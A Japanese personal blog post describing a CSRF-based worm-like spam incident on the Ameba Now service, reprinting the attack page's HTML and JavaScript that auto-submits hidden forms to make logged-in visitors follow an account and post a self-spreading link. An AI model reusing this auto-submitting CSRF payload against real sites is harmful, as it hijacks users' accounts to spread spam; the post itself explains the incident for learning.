新・元地方の中規模印刷会社で苦悩するWebデザイナー改めWebディレクターの日記

自由な20代、窮屈な30代を経て、遂に40代になっちまったWebディレクター&パソコン講師の覚書と思う言(こと)。略称【ちほちゅう】

*

「Ameba(アメーバ)なう」でこんにちは!祭

   

  • このエントリーをはてなブックマークに追加

1年以上前の記事です。内容が古い可能性があります。

先日、パソコン版が使えるようになったばかりの「Amebaなう」でこんにちは!!ワーム(のようなもの)が発生しているそうだ。

【緊急】アメーバなう利用中の皆さんへ【ご注意!】|ぼくはまちちゃん!(アメーバ)

お友達の書き込みに「こんにちはこんにちは!!」というものがあったら 絶対にクリックしないでください!!!!

アメーバにアクセスしている状態でこちらのリンクを踏むと感染?する。
アメーバなうでこんにちは! (←今は動かないようですが念のため踏まないでください)

ネットワーク 現場の教科書 増補改訂版 (IDGムックシリーズ)ネットワーク 現場の教科書 増補改訂版 (IDGムックシリーズ)
販売元:アイ・ディ・ジー・ジャパン
発売日:2008-07-16
レビューを見る

スポンサーリンク
 

クロスサイトスクリプティングに似たクロスサイトリクエストフォージェリ(CSRF)といった技術を使ったワームのようなものらしい。
@IT:「ぼくはまちちゃん」 ――知られざるCSRF攻撃

ちなみにソースはHTMLとJavascriptだけという簡単なもの。
勉強になるので公開しちゃう。いいですよね、製作者さん。

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>アメーバなうでこんにちは!</title>
</head>
<body onload="document.getElementById('f1').submit();document.getElementById('f2').submit()">
<form action="http://now.ameba.jp/api/follow" method="post" id="f1" target="ifr1">
<input type="text" name="followAmebaId" value="主のID">
</form>
<form action="http://ucsnow.ameba.jp/post" method="post" id="f2" target="ifr2">
<input type="text" name="entryText" value="こんにちはこんにちは!! http://bit.ly/7RIjd8">
<input type="text" name="replyEntryId" value="0000">
</form>
<iframe name="ifr1"></iframe>
<iframe name="ifr2"></iframe>
</body>
</html>

このページを開くとonloadで書かれたスクリプトが実行される。
スクリプトにはフォームのサブミット(送信)ボタンを押せと書かれている。
で、そのフォームが「Amebaなう」に上記サイトのリンクを入れた定型文を書き込むフォームと、主さん?をフォローするフォームになっている。
ちなみにiframeはその結果を表示させるためにある。
(followAmebaIdとreplyEntryIdは書き換えました)

まあ、単純に「Amebaなう」内だけではなく、外部からも書き込みやフォローができるようになっていたということだと思う。

とりあえず現在は閉めちゃったみたいで動いていないみたい。
主さんのAmebaなうアカウントも消されちゃったみたいですし。。

一部ではAmebaのマーケティング手法の一つだろうと言っている人もいますが果たして。。

Amebaなう(アメーバなう)
のりささんの投稿したなう | Amebaなう(アメーバなう)

※ この記事は前日の深夜書いたものでして、現在上記「アメーバなうでこんにちは!」のサイトは全く危険性の無いサイトに入れ替わっています。(公開時追記)
※ ブコメで指摘受けたのでワーム(のようなもの)に表記を変えました。
ちなみにワームとは (さらに追記)

 - セキュリティ, 雑談

アドセンス広告メイン

Message

メールアドレスが公開されることはありません。

  関連記事

no image
【ドキュメンタリー】リクルートエージェントで転職05

1年以上前の記事です。内容が古い可能性があります。さて、今回はリクルートエージェ …

次のバブルは環境(CO2)

1年以上前の記事です。内容が古い可能性があります。池田先生の意見が僕の意見と一緒 …

衆議院議員総選挙で自民党大勝。憲法改正へ

1年以上前の記事です。内容が古い可能性があります。衆議院議員総選挙が終わりました …

no image
Googleページランクが更新(有料リンクとネット広告)

1年以上前の記事です。内容が古い可能性があります。先日、googleのページラン …

no image
さらに上へ

1年以上前の記事です。内容が古い可能性があります。Webチームが1年かけてようや …

no image
自殺や大量殺人は事前に防げる!?

1年以上前の記事です。内容が古い可能性があります。「苦悩するアイドルたちの本音」 …

no image
無線LANは気をつけよう(WEPを解読するソフトが登場)

1年以上前の記事です。内容が古い可能性があります。非常に怖いニュースです。 □一 …

no image
どこまで落ちるの?

1年以上前の記事です。内容が古い可能性があります。ライブドア株ですが取引が成立し …

no image
ちょこっと社内のこと

1年以上前の記事です。内容が古い可能性があります。WebチームNo.2のわかこち …

no image
FC2で一発掲載。

1年以上前の記事です。内容が古い可能性があります。Yahooの「この話題に関する …

血液型オヤジ